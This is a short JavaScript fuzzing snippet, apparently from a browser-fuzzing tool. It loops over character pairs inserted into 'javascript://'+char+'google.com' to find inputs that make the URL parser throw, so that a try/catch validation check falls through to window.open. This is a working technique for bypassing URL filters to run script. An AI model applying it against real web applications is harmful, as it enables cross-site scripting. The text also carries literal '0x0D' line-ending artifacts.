1
1
1Trying to bypass a check implemented like this try { parsedUrl = new URL(url) // do some checks protocol,host } catch(e){ // fine we can use it simply window.open(url) }
char = String.fromCodePoint($[i],$[j])0x0D
url = "javascript://"+char+"google.com"0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
pwn(url,char)0x0D
}0x0D
0x0D
function pwn(url,char){0x0D
try{0x0D
window.open(url)0x0D
console.log("shirley");0x0D
log($[i],$[j])0x0D
}catch(e){0x0D
}0x0D
}